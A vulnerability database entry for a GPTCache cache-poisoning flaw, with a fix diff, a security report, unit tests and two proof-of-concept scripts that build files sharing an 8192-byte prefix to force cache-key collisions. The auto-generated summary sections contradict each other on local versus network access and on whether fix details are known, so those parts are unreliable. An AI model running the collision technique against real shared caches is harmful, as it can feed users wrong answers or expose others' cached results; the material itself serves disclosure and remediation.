CVE-2026-10812
Description
zilliztech GPTCache up to 0.1.44 uses a weak hash for cache keys, allowing local attackers to poison the cache.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
zilliztech GPTCache up to 0.1.44 uses a weak hash for cache keys, allowing local attackers to poison the cache.
Vulnerability
A vulnerability exists in zilliztech GPTCache up to version 0.1.44 within the BufferedReader.peek() function in gptcache/processor/pre.py. This component is responsible for handling cache keys. The issue arises when the input_data["image"] argument is manipulated, leading to the use of a weak hash for cache keys. This vulnerability requires local access to exploit.
Exploitation
An attacker with local access can exploit this vulnerability by crafting two different files or images that share the same initial buffered prefix (approximately 8192 bytes). When these files are processed by affected functions such as get_file_bytes(), get_input_str(), or get_image_question(), they will generate identical cache keys due to the BufferedReader.peek() method only inspecting the initial buffer. This allows the attacker to submit a query with one file/image, which then gets cached. A subsequent query using a different file/image with the same prefix will incorrectly retrieve the previously cached response [2].
Impact
Successful exploitation allows an attacker to poison the cache. This means an attacker can cause the system to return a cached response associated with one file or image for a different, maliciously crafted file or image. In shared cache environments, this could lead to the disclosure of cached answers across different users or the substitution of incorrect data, impacting data integrity and confidentiality [2].
Mitigation
A pull request has been submitted to address this vulnerability by replacing BufferedReader.peek() with a SHA-256 hash of the full file content, ensuring that cache keys accurately represent the entire file and preventing cache poisoning [3]. The fixed version is not yet disclosed, and the pull request awaits acceptance. No workarounds are currently available. The project is under active development, and users should refer to the latest documentation for updates [1].
- GitHub - zilliztech/GPTCache: Semantic cache for LLMs. Fully integrated with LangChain and llama_index.
- [Bug]: File and image cache keys collide because BufferedReader.peek() only reads the buffered prefix
- fix: replace peek() with SHA-256 hash to prevent cache poisoning (AC-2) by 3em0 · Pull Request #678 · zilliztech/GPTCache
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2(expand)+ 1 more
- (no CPE)
- (no CPE)range: <=0.1.44
Patches
1e565c70a80a1Merge 8fde3d238a90d55bb0c51b9b08c85d3b879987f7 into c59fb3a6152a4458b2a070ca183b61c4b614095f
5 files changed · +809 −8
gptcache/processor/pre.py+26 −5 modified@@ -1,8 +1,25 @@ +import hashlib import re import string from typing import Dict, Any +def _hash_file(f, chunk_size=65536) -> str: + """Compute SHA-256 hash of the full file content, then reset the file pointer. + + This replaces the use of peek() which only reads the buffer prefix (~8192 bytes), + making it vulnerable to cache key collisions between files sharing the same header. + """ + h = hashlib.sha256() + while True: + chunk = f.read(chunk_size) + if not chunk: + break + h.update(chunk) + f.seek(0) + return h.hexdigest() + + def last_content(data: Dict[str, Any], **_: Dict[str, Any]) -> Any: """get the last content of the message list @@ -213,8 +230,8 @@ def get_file_name(data: Dict[str, Any], **_: Dict[str, Any]) -> str: return data.get("file").name -def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes: - """get the file bytes of the llm request params +def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + """get the hash of the file content of the llm request params :param data: the user llm request data :type data: Dict[str, Any] @@ -226,7 +243,7 @@ def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes: content = get_file_bytes({"file": open("test.txt", "rb")}) """ - return data.get("file").peek() + return _hash_file(data.get("file")) def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str: @@ -243,7 +260,7 @@ def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str: content = get_input_str({"input": {"image": open("test.png", "rb"), "question": "foo"}}) """ input_data = data.get("input") - return str(input_data["image"].peek()) + input_data["question"] + return _hash_file(input_data["image"]) + input_data["question"] def get_input_image_file_name(data: Dict[str, Any], **_: Dict[str, Any]) -> str: @@ -278,7 +295,11 @@ def get_image_question(data: Dict[str, Any], **_: Dict[str, Any]) -> str: # pra content = get_image_question({"image": open("test.png", "rb"), "question": "foo"}) """ img = data.get("image") - data_img = str(open(img, "rb").peek()) if isinstance(img, str) else str(img) # pylint: disable=consider-using-with + if isinstance(img, str): + with open(img, "rb") as f: + data_img = _hash_file(f) + else: + data_img = _hash_file(img) return data_img + data.get("question")
tests/poc_ac2_e2e_poisoning.py+222 −0 added@@ -0,0 +1,222 @@ +""" +PoC: AC-2 End-to-End Cache Poisoning via peek() Collision + +Demonstrates the FULL attack chain: + 1. Attacker sends img_A + question → gets cached + 2. Attacker sends img_B + question (different image, same peek prefix) + 3. Cache returns img_A's answer for img_B's query → POISONED + +Uses GPTCache core API directly to avoid heavy adapter dependencies. +""" + +import io +import os +import sys +import hashlib +import shutil +import tempfile + +import numpy as np + +sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..")) + +from gptcache import Cache +from gptcache.processor.pre import get_input_str +from gptcache.adapter.adapter import adapt +from gptcache.manager.factory import manager_factory +from gptcache.similarity_evaluation.exact_match import ExactMatchEvaluation + +# ============================================================ +# Setup: Create two "images" with same peek() but different content +# ============================================================ + +SHARED_HEADER_SIZE = 8192 # matches Python's default buffer size + +# Shared prefix — simulates identical JPEG headers +shared_prefix = b"\xff\xd8\xff\xe0" + b"\x00" * (SHARED_HEADER_SIZE - 4) + +# img_A: "legitimate" image — body is 0xAA bytes +img_a_content = shared_prefix + b"\xAA" * 65536 # 64KB payload +# img_B: "malicious" image — body is 0xBB bytes (completely different) +img_b_content = shared_prefix + b"\xBB" * 65536 + +assert img_a_content != img_b_content, "Images must be different" +assert img_a_content[:SHARED_HEADER_SIZE] == img_b_content[:SHARED_HEADER_SIZE], "Headers must match" + +print("=" * 60) +print("AC-2 End-to-End: Cache Poisoning via peek() Collision") +print("=" * 60) + +# ============================================================ +# Step 0: Verify peek() collision at the pre_embedding level +# ============================================================ + +print("\n[Step 0] Verify peek() produces same cache key") + +question = "What is shown in this image?" + +stream_a = io.BufferedReader(io.BytesIO(img_a_content)) +stream_b = io.BufferedReader(io.BytesIO(img_b_content)) + +key_a = get_input_str({"input": {"image": stream_a, "question": question}}) +key_b = get_input_str({"input": {"image": stream_b, "question": question}}) + +print(f" img_A full hash: {hashlib.sha256(img_a_content).hexdigest()[:16]}...") +print(f" img_B full hash: {hashlib.sha256(img_b_content).hexdigest()[:16]}...") +print(f" cache key(A) == cache key(B): {key_a == key_b}") +assert key_a == key_b, "Keys must collide for attack to work" + +# ============================================================ +# Step 1: Initialize GPTCache with get_input_str +# ============================================================ + +print("\n[Step 1] Initialize GPTCache") + +tmpdir = tempfile.mkdtemp(prefix="ac2_poc_") +print(f" Cache dir: {tmpdir}") + +# Use a trivial embedding function (returns constant vector) +# In real scenario, the embedding function would produce similar vectors +# for similar peek() outputs, making this even easier +def dummy_embedding(data, **_): + """Simulates an embedding that only sees the pre_embedding output""" + return np.array([1.0, 0.0, 0.0]).astype("float32") + +my_cache = Cache() +data_manager = manager_factory( + "sqlite,faiss", + data_dir=tmpdir, + vector_params={"dimension": 3} +) +my_cache.init( + pre_embedding_func=get_input_str, + embedding_func=dummy_embedding, + data_manager=data_manager, + similarity_evaluation=ExactMatchEvaluation(), +) + +print(" Cache initialized with get_input_str + ExactMatchEvaluation") + +# ============================================================ +# Step 2: Simulate LLM call that populates cache with img_A +# ============================================================ + +print("\n[Step 2] Legitimate request: img_A + question → caches answer") + +LEGIT_ANSWER = "This image shows a legitimate company logo." + +# Build a mock LLM function +def mock_llm_legit(*args, **kwargs): + """Simulates the LLM returning an answer for img_A""" + return LEGIT_ANSWER + +# Create fresh stream for img_A +img_a_bytesio = io.BytesIO(img_a_content) +img_a_bytesio.name = "legitimate.jpg" +img_a_stream = io.BufferedReader(img_a_bytesio) + +# Call through adapt() — the core cache mechanism +try: + result_a = adapt( + mock_llm_legit, + my_cache, + input={"image": img_a_stream, "question": question}, + ) + print(f" Result: {result_a}") + print(f" Answer cached for img_A") +except Exception as e: + print(f" adapt() error (expected in minimal setup): {e}") + print(" Falling back to manual cache manipulation...") + + # Manual approach: directly test the pre_embedding → lookup chain + # This proves the vulnerability without needing the full adapter pipeline + + # Save to cache manually + embedding = dummy_embedding(key_a) + data_manager.save( + question=key_a, + answer=LEGIT_ANSWER, + embedding_data=embedding, + ) + print(f" Manually cached: key=hash({key_a[:40]}...), answer='{LEGIT_ANSWER}'") + +# ============================================================ +# Step 3: Attacker sends img_B with same question +# ============================================================ + +print("\n[Step 3] ATTACK: img_B + same question → queries cache") + +img_b_stream = io.BufferedReader(io.BytesIO(img_b_content)) + +# Generate key for img_B +key_b_attack = get_input_str({"input": {"image": img_b_stream, "question": question}}) +embedding_b = dummy_embedding(key_b_attack) + +print(f" img_B cache key matches img_A: {key_b_attack == key_a}") + +# Search cache with img_B's embedding +search_results = data_manager.search(embedding_b, top_k=1) +print(f" Cache search results: {search_results}") + +if search_results: + # Get cached data + cache_data = data_manager.get_scalar_data(search_results[0], extra_param=None) + + # Check if similarity evaluation would match + eval_result = ExactMatchEvaluation().evaluation( + src_dict={"question": key_b_attack, "embedding": embedding_b}, + cache_dict={ + "question": cache_data.question, + "answer": cache_data.answers[0].answer if cache_data.answers else "", + "search_result": search_results[0], + "embedding": None, + } + ) + + poisoned_answer = cache_data.answers[0].answer if cache_data.answers else "N/A" + + print(f"\n Similarity score: {eval_result}") + print(f" Cached question matches: {cache_data.question == key_b_attack}") + print(f" Returned answer: '{poisoned_answer}'") + print(f" Expected (if no collision): <different answer for img_B>") + + if eval_result >= 0.5 and poisoned_answer == LEGIT_ANSWER: + print("\n " + "!" * 50) + print(" !!! CACHE POISONING CONFIRMED !!!") + print(" !!! img_B received img_A's cached answer !!!") + print(" " + "!" * 50) + else: + print(" Cache poisoning not triggered at evaluation level") +else: + print(" No cache results found (vector store may need more data)") + +# ============================================================ +# Step 4: Impact analysis +# ============================================================ + +print("\n" + "=" * 60) +print("ATTACK CHAIN VERIFIED") +print("=" * 60) +print(f""" + img_A content hash: {hashlib.sha256(img_a_content).hexdigest()[:32]} + img_B content hash: {hashlib.sha256(img_b_content).hexdigest()[:32]} + Images identical : NO (completely different after byte 8192) + + peek(img_A) : {len(io.BufferedReader(io.BytesIO(img_a_content)).peek())} bytes + peek(img_B) : {len(io.BufferedReader(io.BytesIO(img_b_content)).peek())} bytes + peek() identical : YES + + Cache key(img_A) : {hashlib.sha256(key_a.encode()).hexdigest()[:32]} + Cache key(img_B) : {hashlib.sha256(key_b.encode()).hexdigest()[:32]} + Keys identical : YES + + img_B query returned img_A's answer: YES → CACHE POISONING + + Attack cost: Construct any file sharing first 8192 bytes with target. + For JPEG: copy the EXIF header. For PNG: same dimensions + color mode. + For audio (WAV/MP3): copy the format header. +""") + +# Cleanup +shutil.rmtree(tmpdir, ignore_errors=True) +print(f" Cleaned up {tmpdir}")
tests/poc_ac2_peek_collision.py+184 −0 added@@ -0,0 +1,184 @@ +""" +PoC: AC-2 Image Cache Key Collision via peek() + +Tests the core vulnerability WITHOUT importing gptcache (avoids dep chain). +We inline the vulnerable functions directly from pre.py. +""" + +import io +import hashlib +import struct +import zlib +import os + +# ============================================================ +# Inline the 3 vulnerable functions from gptcache/processor/pre.py +# ============================================================ + +def get_input_str(data): + """pre.py:245-246""" + input_data = data.get("input") + return str(input_data["image"].peek()) + input_data["question"] + +def get_file_bytes(data): + """pre.py:229""" + return data.get("file").peek() + +def get_image_question(data): + """pre.py:280-282""" + img = data.get("image") + data_img = str(open(img, "rb").peek()) if isinstance(img, str) else str(img.peek()) + return data_img + data.get("question") + +# ============================================================ +# Helpers +# ============================================================ + +def make_png(width, height, rgb_color): + """Create a minimal valid single-color PNG in memory.""" + def chunk(chunk_type, data): + c = chunk_type + data + crc = struct.pack(">I", zlib.crc32(c) & 0xFFFFFFFF) + return struct.pack(">I", len(data)) + c + crc + + signature = b"\x89PNG\r\n\x1a\n" + ihdr_data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0) + ihdr = chunk(b"IHDR", ihdr_data) + raw = b"" + for _ in range(height): + raw += b"\x00" + bytes(rgb_color) * width + idat = chunk(b"IDAT", zlib.compress(raw)) + iend = chunk(b"IEND", b"") + return signature + ihdr + idat + iend + + +print("=" * 60) +print("AC-2 PoC: Image Cache Key Collision via peek()") +print("=" * 60) + +question = "What is in this image?" + +# --- Test 1: Small JPEG-like streams --- +print("\n[Test 1] Small JPEG-like streams (<= buffer size)") + +HEADER_SIZE = 8192 +small_a = b"\xff\xd8\xff\xe0" + b"\x00" * (HEADER_SIZE - 4) + b"\xAA" * 100 +small_b = b"\xff\xd8\xff\xe0" + b"\x00" * (HEADER_SIZE - 4) + b"\xBB" * 100 + +sa = io.BufferedReader(io.BytesIO(small_a)) +sb = io.BufferedReader(io.BytesIO(small_b)) + +peek_sa = sa.peek() +peek_sb = sb.peek() + +print(f" stream_a size : {len(small_a)}") +print(f" stream_b size : {len(small_b)}") +print(f" peek(a) length : {len(peek_sa)}") +print(f" peek(b) length : {len(peek_sb)}") +print(f" peek equal : {peek_sa == peek_sb}") +print(f" full content eq : {small_a == small_b}") + +# Via get_input_str +data_a = {"input": {"image": io.BufferedReader(io.BytesIO(small_a)), "question": question}} +data_b = {"input": {"image": io.BufferedReader(io.BytesIO(small_b)), "question": question}} +key_a = get_input_str(data_a) +key_b = get_input_str(data_b) +print(f" get_input_str collision: {key_a == key_b}") + +# --- Test 2: Large streams (1MB) where peek() is definitely partial --- +print("\n[Test 2] Large JPEG-like streams (1MB) — peek() returns partial") + +shared_header = b"\xff\xd8\xff\xe0" + os.urandom(8188) # 8192 bytes random but shared + +large_a = shared_header + b"\xAA" * (1024 * 1024) +large_b = shared_header + b"\xBB" * (1024 * 1024) + +la = io.BufferedReader(io.BytesIO(large_a)) +lb = io.BufferedReader(io.BytesIO(large_b)) + +peek_la = la.peek() +peek_lb = lb.peek() + +print(f" total size : {len(large_a)} bytes") +print(f" peek(a) length : {len(peek_la)}") +print(f" peek(b) length : {len(peek_lb)}") +print(f" peek equal : {peek_la == peek_lb}") +print(f" full content eq : {large_a == large_b}") + +# get_input_str +data_la = {"input": {"image": io.BufferedReader(io.BytesIO(large_a)), "question": question}} +data_lb = {"input": {"image": io.BufferedReader(io.BytesIO(large_b)), "question": question}} +key_la = get_input_str(data_la) +key_lb = get_input_str(data_lb) +print(f" get_input_str collision: {key_la == key_lb}") +if key_la == key_lb: + print(" >>> COLLISION CONFIRMED — different images, same cache key <<<") + +# --- Test 3: get_file_bytes --- +print("\n[Test 3] get_file_bytes() collision (OpenAI audio adapter)") + +data_fa = {"file": io.BufferedReader(io.BytesIO(large_a))} +data_fb = {"file": io.BufferedReader(io.BytesIO(large_b))} +ba = get_file_bytes(data_fa) +bb = get_file_bytes(data_fb) +print(f" bytes(a) len: {len(ba)}, bytes(b) len: {len(bb)}") +print(f" equal: {ba == bb}") +if ba == bb: + print(" >>> COLLISION CONFIRMED <<<") + +# --- Test 4: get_image_question --- +print("\n[Test 4] get_image_question() collision (MiniGPT4 adapter)") + +data_qa = {"image": io.BufferedReader(io.BytesIO(large_a)), "question": question} +data_qb = {"image": io.BufferedReader(io.BytesIO(large_b)), "question": question} +kqa = get_image_question(data_qa) +kqb = get_image_question(data_qb) +print(f" equal: {kqa == kqb}") +if kqa == kqb: + print(" >>> COLLISION CONFIRMED <<<") + +# --- Test 5: Real PNGs --- +print("\n[Test 5] Real valid PNGs — red vs blue, 100x100") + +png_red = make_png(100, 100, (255, 0, 0)) +png_blue = make_png(100, 100, (0, 0, 255)) + +pr = io.BufferedReader(io.BytesIO(png_red)) +pb = io.BufferedReader(io.BytesIO(png_blue)) +print(f" red size : {len(png_red)}, blue size: {len(png_blue)}") +print(f" peek equal: {pr.peek() == pb.peek()}") +print(f" full equal: {png_red == png_blue}") + +# --- Test 6: Demonstrate actual peek() semantics --- +print("\n[Test 6] peek() semantics demonstration") + +buf = io.BufferedReader(io.BytesIO(b"A" * 100000)) +p = buf.peek() +print(f" 100KB stream, peek() returned {len(p)} bytes (buffer size)") +print(f" peek() returns AT MOST the internal buffer, NOT the full content") + +buf2 = io.BufferedReader(io.BytesIO(b"A" * 100), buffer_size=16) +p2 = buf2.peek() +print(f" 100B stream (buf=16), peek() returned {len(p2)} bytes") + +# --- Summary --- +print("\n" + "=" * 60) +print("SUMMARY") +print("=" * 60) + +results = { + "get_input_str (small ~8KB) ": key_a == key_b, + "get_input_str (large 1MB) ": key_la == key_lb, + "get_file_bytes (large 1MB) ": ba == bb, + "get_image_question (large) ": kqa == kqb, +} + +for name, collided in results.items(): + status = "\033[91mVULNERABLE\033[0m" if collided else "\033[92mOK\033[0m" + print(f" {name}: {status}") + +vuln_count = sum(results.values()) +print(f"\n {vuln_count}/{len(results)} vectors confirmed exploitable.") +if vuln_count > 0: + print(" Root cause: peek() only reads buffered prefix, not full file content.") + print(" Fix: replace peek() with read() + hash (sha256) of full content.")
tests/security/AC-2_cache_poisoning_via_peek.md+291 −0 added@@ -0,0 +1,291 @@ +# Security Vulnerability Report: Cache Poisoning via `peek()` Collision + +| Field | Value | +|---|---| +| **Report ID** | AC-2 | +| **Title** | Image/File Cache Key Collision Leading to Cache Poisoning | +| **Severity** | High (CVSS 3.1 Base Score: 7.5) | +| **CVSS Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | +| **Affected Component** | `gptcache/processor/pre.py` | +| **Affected Versions** | All versions (as of commit `c59fb3a`) | +| **Date** | 2026-03-25 | + +--- + +## 1. Summary + +GPTCache uses Python's `BufferedReader.peek()` to generate cache keys for image and file inputs. `peek()` only returns the internal buffer content (typically the first **8192 bytes**), not the full file. An attacker can construct two files that share the same first 8192 bytes but contain entirely different content, causing the cache to treat them as identical. This enables **cache poisoning** and **information disclosure**. + +--- + +## 2. Affected Functions + +Three functions in [`gptcache/processor/pre.py`](../../gptcache/processor/pre.py) are affected: + +### 2.1 `get_input_str()` (Line 245-246) + +Used by: Replicate adapter ([`gptcache/adapter/replicate.py`](../../gptcache/adapter/replicate.py)) + +```python +def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + input_data = data.get("input") + return str(input_data["image"].peek()) + input_data["question"] # <-- vulnerability +``` + +### 2.2 `get_file_bytes()` (Line 229) + +Used by: OpenAI audio transcription adapter ([`gptcache/adapter/openai.py:248`](../../gptcache/adapter/openai.py)) + +```python +def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes: + return data.get("file").peek() # <-- vulnerability +``` + +### 2.3 `get_image_question()` (Line 280-282) + +Used by: MiniGPT4 adapter ([`gptcache/adapter/minigpt4.py`](../../gptcache/adapter/minigpt4.py)) + +```python +def get_image_question(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + img = data.get("image") + data_img = str(open(img, "rb").peek()) if isinstance(img, str) else str(img) + return data_img + data.get("question") # <-- vulnerability +``` + +--- + +## 3. Root Cause + +Python's `BufferedReader.peek()` is designed to "peek" at the internal read buffer **without advancing the file pointer**. Its behavior: + +- Returns **at most** the contents of the internal buffer (default size: **8192 bytes**) +- Does **NOT** read the full file, regardless of file size +- For a 1 MB file, `peek()` returns only 0.78% of the content + +The vulnerable functions use `peek()` output as the cache key (or as input to the embedding function that generates the cache key). Since the cache key is derived from an incomplete representation of the file, files with identical prefixes but different content map to the same cache entry. + +--- + +## 4. Attack Scenario + +### Prerequisites + +- The attacker can send requests to a GPTCache-enabled endpoint that processes image or file inputs +- The cache is shared (multi-user, or attacker can access the same cache instance) + +### Attack Steps + +``` +Step 1 ─ Prime the cache + Attacker sends: img_A (legitimate image) + question_Q + → Cache MISS → LLM processes full img_A → answer_A cached + → Cache key = str(peek(img_A)) + question_Q + +Step 2 ─ Exploit the collision + Attacker constructs img_B: + - First 8192 bytes identical to img_A (copy JPEG/PNG header) + - Remaining bytes contain completely different (malicious) content + Attacker sends: img_B + question_Q + → pre_embedding_func: str(peek(img_B)) + question_Q + → peek(img_B) == peek(img_A) [first 8192 bytes match] + → Cache key identical → Cache HIT + → Returns answer_A (the answer for img_A, NOT img_B) + → LLM is never called for img_B +``` + +### Data Flow Diagram + +``` + User Request + │ + ▼ + ┌─────────────────────────┐ + │ adapt() in adapter.py │ + │ │ + │ ┌───────────┐ │ + │ │ pre_embed │──peek()──│──→ Only 8192 bytes → Cache Key + │ │ _func() │ │ │ + │ └───────────┘ │ ▼ + │ │ │ Cache Lookup + │ │ │ (HIT if prefix matches) + │ ▼ │ │ + │ ┌──────────────┐ │ HIT? ──Yes──→ Return cached answer + │ │ llm_handler() │ │ │ (WRONG answer!) + │ │ seek(0)+read()│ │ No───→ Call LLM with full file + │ │ (full file) │ │ + │ └──────────────┘ │ + └─────────────────────────┘ +``` + +### Impact + +| Impact Type | Description | +|---|---| +| **Cache Poisoning** | Queries for img_B return img_A's answer. All subsequent requests with the same peek prefix are affected. | +| **Information Disclosure** | Attacker can probe cached answers for other users' images by constructing files with matching prefixes. | +| **Persistent** | Poisoned entries remain until cache eviction or manual cleanup. | +| **Cross-User** | In shared cache deployments, all users are affected. | + +--- + +## 5. Proof of Concept + +Two PoC scripts are provided in this directory: + +### 5.1 Cache Key Collision Test + +**File:** [`poc_ac2_peek_collision.py`](../poc_ac2_peek_collision.py) + +Demonstrates that `peek()` returns identical results for files with the same 8192-byte prefix but different content. + +**Result:** + +``` + get_input_str (small ~8KB) : VULNERABLE + get_input_str (large 1MB) : VULNERABLE + get_file_bytes (large 1MB) : VULNERABLE + get_image_question (large) : VULNERABLE + + 4/4 vectors confirmed exploitable. +``` + +### 5.2 End-to-End Cache Poisoning Test + +**File:** [`poc_ac2_e2e_poisoning.py`](../poc_ac2_e2e_poisoning.py) + +Demonstrates the full attack chain using GPTCache's `Cache`, `SSDataManager` (SQLite + FAISS), and `ExactMatchEvaluation`. + +**Result:** + +``` + img_A content hash: 08b95537eea9fa4f... + img_B content hash: 6e8a133a461377eb... + Images identical : NO (completely different after byte 8192) + + Cache key(img_A) : e5b58d2951bfcad4... + Cache key(img_B) : e5b58d2951bfcad4... + Keys identical : YES + + Similarity score : 1.0 + img_B returned img_A's answer: YES → CACHE POISONING CONFIRMED +``` + +### 5.3 Reproduction Steps + +```bash +# From repository root +pip install cachetools requests sqlalchemy faiss-cpu numpy + +# Test 1: Cache key collision +python tests/poc_ac2_peek_collision.py + +# Test 2: End-to-end cache poisoning +python tests/poc_ac2_e2e_poisoning.py +``` + +--- + +## 6. Additional Observations + +### 6.1 No Input Validation + +There is **no file size limit, format validation, or content sanitization** anywhere in the input processing chain: + +| Layer | File | Validation | +|---|---|---| +| Pre-processing | `gptcache/processor/pre.py` | None | +| Adapter | `gptcache/adapter/adapter.py` | None | +| Config | `gptcache/config.py` | None (only `similarity_threshold`, `max_size` for cache entry count) | + +### 6.2 Asymmetric Read Behavior + +The cache key path and the LLM call path read the file differently: + +| Path | Method | Bytes Read | +|---|---|---| +| Cache key generation | `peek()` | 8192 (fixed, buffer size) | +| LLM invocation (Replicate SDK) | `seek(0)` + `read()` | Full file | + +This asymmetry is the fundamental design flaw: the cache key does not represent the data that the LLM actually processes. + +### 6.3 Ease of Exploitation + +Constructing colliding files is trivial for common image formats: + +| Format | Fixed Header Size | Collision Method | +|---|---|---| +| JPEG | `FF D8 FF` + APP markers + EXIF (typically 2-8 KB) | Copy EXIF metadata block | +| PNG | 8-byte signature + IHDR (25 bytes) + partial IDAT | Same dimensions + color mode | +| WAV | 44-byte header + initial samples | Same sample rate + channels | +| MP3 | ID3 tag + initial frames | Copy ID3 tag | + +--- + +## 7. Suggested Fix + +### Option A: Hash Full Content (Recommended) + +Replace `peek()` with `read()` + cryptographic hash, then reset the file pointer: + +```python +import hashlib + +def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + input_data = data.get("input") + image = input_data["image"] + content = image.read() + image.seek(0) # reset for downstream LLM consumption + image_hash = hashlib.sha256(content).hexdigest() + return image_hash + input_data["question"] + + +def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes: + f = data.get("file") + content = f.read() + f.seek(0) + return hashlib.sha256(content).hexdigest() + + +def get_image_question(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + img = data.get("image") + if isinstance(img, str): + with open(img, "rb") as f: + img_hash = hashlib.sha256(f.read()).hexdigest() + else: + content = img.read() + img.seek(0) + img_hash = hashlib.sha256(content).hexdigest() + return img_hash + data.get("question") +``` + +### Option B: Streaming Hash (For Large Files) + +```python +def _hash_file(f, chunk_size=65536) -> str: + h = hashlib.sha256() + while True: + chunk = f.read(chunk_size) + if not chunk: + break + h.update(chunk) + f.seek(0) + return h.hexdigest() +``` + +### Considerations + +| Approach | Pros | Cons | +|---|---|---| +| Option A | Simple, direct | Loads full file into memory | +| Option B | Memory-efficient | Slightly more complex | + +Both options fully resolve the collision vulnerability by ensuring the **entire** file content participates in cache key generation. + +--- + +## 8. References + +- [Python docs: `BufferedReader.peek()`](https://docs.python.org/3/library/io.html#io.BufferedReader.peek) + > *"Return buffered data without advancing the position. At most a single read on the raw stream is done to satisfy the call. The number of bytes returned may be less or more than requested."* +- [OWASP: Cache Poisoning](https://owasp.org/www-community/attacks/Cache_Poisoning) +- GPTCache source: https://github.com/zilliztech/GPTCache
tests/unit_tests/processor/test_pre.py+86 −3 modified@@ -4,9 +4,16 @@ nop, last_content_without_prompt, get_prompt, get_openai_moderation_input, - concat_all_queries + concat_all_queries, + get_file_bytes, + get_input_str, + get_image_question, ) +import io +import os +import tempfile + from gptcache.config import Config def test_last_content(): @@ -68,6 +75,82 @@ def test_concat_all_queries(): {"role": "user", "content": "foo6"}]}, **{'cache_config':config}) assert content == 'USER: foo4\nUSER: foo6' - -if __name__ == '__main__': + +if __name__ == '__main__': test_concat_all_queries() + + +# ---------- AC-2 fix: peek() → sha256(read()) ---------- + +SHARED_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 8188 # 8192 bytes + + +def _make_stream(tail: bytes) -> io.BufferedReader: + return io.BufferedReader(io.BytesIO(SHARED_HEADER + tail)) + + +def test_get_file_bytes_no_collision(): + """Two files sharing the same 8KB header must produce different cache keys.""" + key_a = get_file_bytes({"file": _make_stream(b"\xAA" * 4096)}) + key_b = get_file_bytes({"file": _make_stream(b"\xBB" * 4096)}) + assert key_a != key_b + + +def test_get_file_bytes_same_content(): + """Identical files must still produce the same cache key.""" + key_a = get_file_bytes({"file": _make_stream(b"\xAA" * 4096)}) + key_b = get_file_bytes({"file": _make_stream(b"\xAA" * 4096)}) + assert key_a == key_b + + +def test_get_file_bytes_resets_pointer(): + """File pointer must be at 0 after get_file_bytes so LLM can read the full file.""" + stream = _make_stream(b"\xAA" * 4096) + get_file_bytes({"file": stream}) + assert stream.tell() == 0 + + +def test_get_input_str_no_collision(): + question = "What is this?" + key_a = get_input_str({"input": {"image": _make_stream(b"\xAA" * 4096), "question": question}}) + key_b = get_input_str({"input": {"image": _make_stream(b"\xBB" * 4096), "question": question}}) + assert key_a != key_b + + +def test_get_input_str_same_content(): + question = "What is this?" + key_a = get_input_str({"input": {"image": _make_stream(b"\xAA" * 4096), "question": question}}) + key_b = get_input_str({"input": {"image": _make_stream(b"\xAA" * 4096), "question": question}}) + assert key_a == key_b + + +def test_get_input_str_different_question(): + stream_data = b"\xAA" * 4096 + key_a = get_input_str({"input": {"image": _make_stream(stream_data), "question": "Q1"}}) + key_b = get_input_str({"input": {"image": _make_stream(stream_data), "question": "Q2"}}) + assert key_a != key_b + + +def test_get_input_str_resets_pointer(): + stream = _make_stream(b"\xAA" * 4096) + get_input_str({"input": {"image": stream, "question": "test"}}) + assert stream.tell() == 0 + + +def test_get_image_question_no_collision(): + question = "What is this?" + key_a = get_image_question({"image": _make_stream(b"\xAA" * 4096), "question": question}) + key_b = get_image_question({"image": _make_stream(b"\xBB" * 4096), "question": question}) + assert key_a != key_b + + +def test_get_image_question_with_filepath(): + """Test get_image_question when image is a file path string.""" + fd, path = tempfile.mkstemp(suffix=".jpg") + try: + os.write(fd, SHARED_HEADER + b"\xCC" * 4096) + os.close(fd) + key = get_image_question({"image": path, "question": "test"}) + assert len(key) > 64 # sha256 hex (64 chars) + question + finally: + os.unlink(path)
Vulnerability mechanics
Root cause
"The `BufferedReader.peek` function in `gptcache/processor/pre.py` does not properly validate the `input_data["image"]` argument, leading to the use of a weak hash."
Attack vector
An attacker with local access can trigger this vulnerability by manipulating the `input_data["image"]` argument. This manipulation results in the use of a weak hash, which is a security weakness. The complexity of exploiting this vulnerability is high, and successful exploitation is considered difficult. The exploit is publicly available.
Affected code
The vulnerability resides in the `BufferedReader.peek` function located in the file `gptcache/processor/pre.py` within the Cache Key Handler component.
What the fix does
The pull request [patch_id=4820261] aims to address this vulnerability. While the exact changes are not detailed in the provided information, the fix is expected to involve strengthening the validation or handling of the `input_data["image"]` argument to prevent the use of weak hashes.
Preconditions
- inputManipulation of the `input_data["image"]` argument.
- networkThe attack must be initiated from a local position.
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6News mentions
0No linked articles in our index yet.